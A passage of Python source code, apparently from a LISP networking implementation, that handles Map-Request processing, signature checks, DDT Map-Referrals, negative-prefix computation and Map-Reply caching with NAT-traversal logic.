lprint("EID-crypto-hash signature verification {}".format(pf))
#endif
#endif
if (pubsub and sig_good == False):
pubsub = False
lprint("Suppress creating pubsub state due to signature failure")
#endif
#
# There are two cases here that need attention. If the Map-Request was
# an IPv6 Map-Request but the ECM came to us in a IPv4 packet, we need
# to return the Map-Reply in IPv4. And if the Map-Request came to us
# through a NAT, sending the Map-Reply to the Map-Request port won't
# get translated by the NAT. So we have to return the Map-Reply to the
# ECM port. Hopefully, the RTR is listening on the ECM port and using
# the Map-Request port as the ECM port as well. This is typically only
# a problem on the RTR, when behind a NAT. For an ITR, it usaully
# doesn't send Map-Requests since NAT-traversal logic installs default
# map-cache entries.
#
reply_dest = itr_rloc if (itr_rloc.afi == ecm_source.afi) else ecm_source
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None or site_eid.is_star_g()):
notfound = bold("Site not found", False)
lprint("{} for requested EID {}".format(notfound,
green(eid_str, False)))
#
# Send negative Map-Reply with TTL 15 minutes.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, 15, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_SITE_NOT_FOUND])
#endif
prefix_str = site_eid.print_eid_tuple()
site_name = site_eid.site.site_name
#
# If we are requesting for non Crypto-EIDs and signatures are configured
# to be requred and no signature is in the Map-Request, bail.
#
if (is_crypto_hash == False and site_eid.require_signature):
sig = map_request.map_request_signature
sig_eid = map_request.signature_eid
if (sig == None or sig_eid.is_null()):
lprint("Signature required for site {}".format(site_name))
sig_good = False
else:
sig_eid = map_request.signature_eid
hash_eid, pubkey, sig_good = lisp_lookup_public_key(sig_eid)
if (sig_good):
sig_good = map_request.verify_map_request_sig(pubkey)
else:
lprint("Public-key lookup failed for sig-eid {}, hash-eid {}".\
format(sig_eid.print_address(), hash_eid.print_address()))
#endif
pf = bold("passed", False) if sig_good else bold("failed", False)
lprint("Required signature verification {}".format(pf))
#endif
#endif
#
# Check if site-eid is registered.
#
if (sig_good and site_eid.registered == False):
lprint("Site '{}' with EID-prefix {} is not registered for EID {}". \
format(site_name, green(prefix_str, False), green(eid_str, False)))
#
# We do not to return a coarser EID-prefix to the Map-Resolver. The
# AMS site entry may be one.
#
if (site_eid.accept_more_specifics == False):
eid = site_eid.eid
group = site_eid.group
#endif
#
# Send forced-TTLs even for native-forward entries.
#
ttl = 1
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Send negative Map-Reply with TTL 1 minute.
#
lisp_send_negative_map_reply(lisp_sockets, eid, group, nonce, itr_rloc,
mr_sport, ttl, xtr_id, pubsub)
return([eid, group, LISP_DDT_ACTION_MS_NOT_REG])
#endif
#
# Should we proxy-reply?
#
nat = False
pr_str = ""
check_policy = False
if (site_eid.force_nat_proxy_reply):
pr_str = ", nat-forced"
nat = True
check_policy = True
elif (site_eid.force_proxy_reply):
pr_str = ", forced"
check_policy = True
elif (site_eid.proxy_reply_requested):
pr_str = ", requested"
check_policy = True
elif (map_request.pitr_bit and site_eid.pitr_proxy_reply_drop):
pr_str = ", drop-to-pitr"
action = LISP_DROP_ACTION
elif (site_eid.proxy_reply_action != ""):
action = site_eid.proxy_reply_action
pr_str = ", forced, action {}".format(action)
action = LISP_DROP_ACTION if (action == "drop") else \
LISP_NATIVE_FORWARD_ACTION
#endif
#
# Apply policy to determine if we send a negative map-reply with action
# "policy-denied" or we send a map-reply with the policy set parameters.
#
policy_drop = False
policy = None
if (check_policy and lisp_policies.has_key(site_eid.policy)):
p = lisp_policies[site_eid.policy]
if (p.match_policy_map_request(map_request, mr_source)): policy = p
if (policy):
ps = bold("matched", False)
lprint("Map-Request {} policy '{}', set-action '{}'".format(ps,
p.policy_name, p.set_action))
else:
ps = bold("no match", False)
lprint("Map-Request {} for policy '{}', implied drop".format(ps,
p.policy_name))
policy_drop = True
#endif
#endif
if (pr_str != ""):
lprint("Proxy-replying for EID {}, found site '{}' EID-prefix {}{}". \
format(green(eid_str, False), site_name, green(prefix_str, False),
pr_str))
rloc_set = site_eid.registered_rlocs
ttl = 1440
if (nat):
if (site_eid.site_id != 0):
seid = map_request.source_eid
rloc_set = lisp_get_private_rloc_set(site_eid, seid, group)
#endif
if (rloc_set == site_eid.registered_rlocs):
m = (site_eid.group.is_null() == False)
new_set = lisp_get_partial_rloc_set(rloc_set, reply_dest, m)
if (new_set != rloc_set):
ttl = 15
rloc_set = new_set
#endif
#endif
#endif
#
# Force TTL if configured. To denote seconds in TTL field of EID-record
# set high-order bit in ttl value.
#
if (site_eid.force_ttl != None):
ttl = site_eid.force_ttl | 0x80000000
#endif
#
# Does policy say what the ttl should be? And if we should drop the
# Map-Request and return a negative Map-Reply
#
if (policy):
if (policy.set_record_ttl):
ttl = policy.set_record_ttl
lprint("Policy set-record-ttl to {}".format(ttl))
#endif
if (policy.set_action == "drop"):
lprint("Policy set-action drop, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
else:
rloc = policy.set_policy_map_reply()
if (rloc): rloc_set = [rloc]
#endif
#endif
if (policy_drop):
lprint("Implied drop action, send negative Map-Reply")
action = LISP_POLICY_DENIED_ACTION
rloc_set = []
#endif
enc = site_eid.echo_nonce_capable
#
# Don't tell spoofer any prefix information about the target EID.
#
if (sig_good):
reply_eid = site_eid.eid
reply_group = site_eid.group
else:
reply_eid = eid
reply_group = group
action = LISP_AUTH_FAILURE_ACTION
rloc_set = []
#endif
#
# If this Map-Request is also a subscription request, return same
# information in a Map-Notify.
#
packet = lisp_build_map_reply(reply_eid, reply_group, rloc_set,
nonce, action, ttl, False, None, enc, False)
if (pubsub):
lisp_process_pubsub(lisp_sockets, packet, reply_eid, itr_rloc,
mr_sport, nonce, ttl, xtr_id)
else:
lisp_send_map_reply(lisp_sockets, packet, itr_rloc, mr_sport)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# If there are no registered RLOCs, return.
#
rloc_count = len(site_eid.registered_rlocs)
if (rloc_count == 0):
lprint("Requested EID {} found site '{}' with EID-prefix {} with " + \
"no registered RLOCs".format(green(eid_str, False), site_name,
green(prefix_str, False)))
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#endif
#
# Forward to ETR at registered site. We have to put in an ECM.
#
hash_address = map_request.target_eid if map_request.source_eid.is_null() \
else map_request.source_eid
hashval = map_request.target_eid.hash_address(hash_address)
hashval %= rloc_count
etr = site_eid.registered_rlocs[hashval]
if (etr.rloc.is_null()):
lprint(("Suppress forwarding Map-Request for EID {} at site '{}' " + \
"EID-prefix {}, no RLOC address").format(green(eid_str, False),
site_name, green(prefix_str, False)))
else:
lprint(("Forwarding Map-Request for EID {} to ETR {} at site '{}' " + \
"EID-prefix {}").format(green(eid_str, False),
red(etr.rloc.print_address(), False), site_name,
green(prefix_str, False)))
#
# Send ECM.
#
lisp_send_ecm(lisp_sockets, packet, map_request.source_eid, mr_sport,
map_request.target_eid, etr.rloc, to_etr=True)
#endif
return([site_eid.eid, site_eid.group, LISP_DDT_ACTION_MS_ACK])
#enddef
#
# lisp_ddt_process_map_request
#
# Do DDT-node processing of a Map-Request received from an Map-Resolver.
#
def lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source, port):
#
# Lookup target EID address in DDT cache.
#
eid = map_request.target_eid
group = map_request.target_group
eid_str = lisp_print_eid_tuple(eid, group)
nonce = map_request.nonce
action = LISP_DDT_ACTION_NULL
#
# First check to see if EID is registered locally if we are a Map-Server.
# Otherwise, do DDT lookup.
#
ddt_entry = None
if (lisp_i_am_ms):
site_eid = lisp_site_eid_lookup(eid, group, False)
if (site_eid == None): return
if (site_eid.registered):
action = LISP_DDT_ACTION_MS_ACK
ttl = 1440
else:
eid, group, action = lisp_ms_compute_neg_prefix(eid, group)
action = LISP_DDT_ACTION_MS_NOT_REG
ttl = 1
#endif
else:
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry == None):
action = LISP_DDT_ACTION_NOT_AUTH
ttl = 0
lprint("DDT delegation entry not found for EID {}".format( \
green(eid_str, False)))
elif (ddt_entry.is_auth_prefix()):
#
# Check auth-prefix. That means there are no referrals.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE
ttl = 15
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint(("DDT delegation entry not found but auth-prefix {} " + \
"found for EID {}").format(ddt_entry_str,
green(eid_str, False)))
if (group.is_null()):
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
lisp_ddt_cache)
else:
group = lisp_ddt_compute_neg_prefix(group, ddt_entry,
lisp_ddt_cache)
eid = lisp_ddt_compute_neg_prefix(eid, ddt_entry,
ddt_entry.source_cache)
#endif
ddt_entry = None
else:
ddt_entry_str = ddt_entry.print_eid_tuple()
lprint("DDT delegation entry {} found for EID {}".format( \
ddt_entry_str, green(eid_str, False)))
ttl = 1440
#endif
#endif
#
# Build and return a Map-Referral message to the source of the Map-Request.
#
packet = lisp_build_map_referral(eid, group, ddt_entry, action, ttl, nonce)
nonce = map_request.nonce >> 32
if (map_request.nonce != 0 and nonce != 0xdfdf0e1d): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_find_negative_mask_len
#
# XOR the two addresses so we can find the first bit that is different. Then
# count the number of bits from the left that bit position is. That is the
# new mask-length. Compare to the neg-prefix mask-length we have found so
# far. If the new one is longer than the stored one so far, replace it.
#
# This function assumes the address size and the address-family are the same
# for 'eid' and 'entry_prefix'. Caller must make sure of that.
#
def lisp_find_negative_mask_len(eid, entry_prefix, neg_prefix):
diff_address = eid.hash_address(entry_prefix)
address_size = eid.addr_length() * 8
mask_len = 0
#
# The first set bit is the one that is different.
#
for mask_len in range(address_size):
bit_test = 1 << (address_size - mask_len - 1)
if (diff_address & bit_test): break
#endfor
if (mask_len > neg_prefix.mask_len): neg_prefix.mask_len = mask_len
return
#enddef
#
# lisp_neg_prefix_walk
#
# Callback routine to decide which prefixes should be considered by function
# lisp_find_negative_mask_len().
#
# 'entry' in this routine could be a lisp_ddt_entry() or a lisp_site_eid().
#
def lisp_neg_prefix_walk(entry, parms):
eid, auth_prefix, neg_prefix = parms
if (auth_prefix == None):
if (entry.eid.instance_id != eid.instance_id):
return([True, parms])
#endif
if (entry.eid.afi != eid.afi): return([True, parms])
else:
if (entry.eid.is_more_specific(auth_prefix) == False):
return([True, parms])
#endif
#endif
#
# Find bits that match.
#
lisp_find_negative_mask_len(eid, entry.eid, neg_prefix)
return([True, parms])
#enddef
#
# lisp_ddt_compute_neg_prefix
#
# Walk the DDT cache to compute the least specific prefix within the auth-
# prefix found.
#
def lisp_ddt_compute_neg_prefix(eid, ddt_entry, cache):
#
# Do not compute negative prefixes for distinguished-names or geo-prefixes.
#
if (eid.is_binary() == False): return(eid)
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
auth_prefix_str = ddt_entry.print_eid_tuple()
auth_prefix = ddt_entry.eid
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Do not let map-cache entries from Map-Replies override gleaned
# entries.
#
if (mc == None):
glean, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (glean): continue
else:
if (mc.gleaned): continue
#endif
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
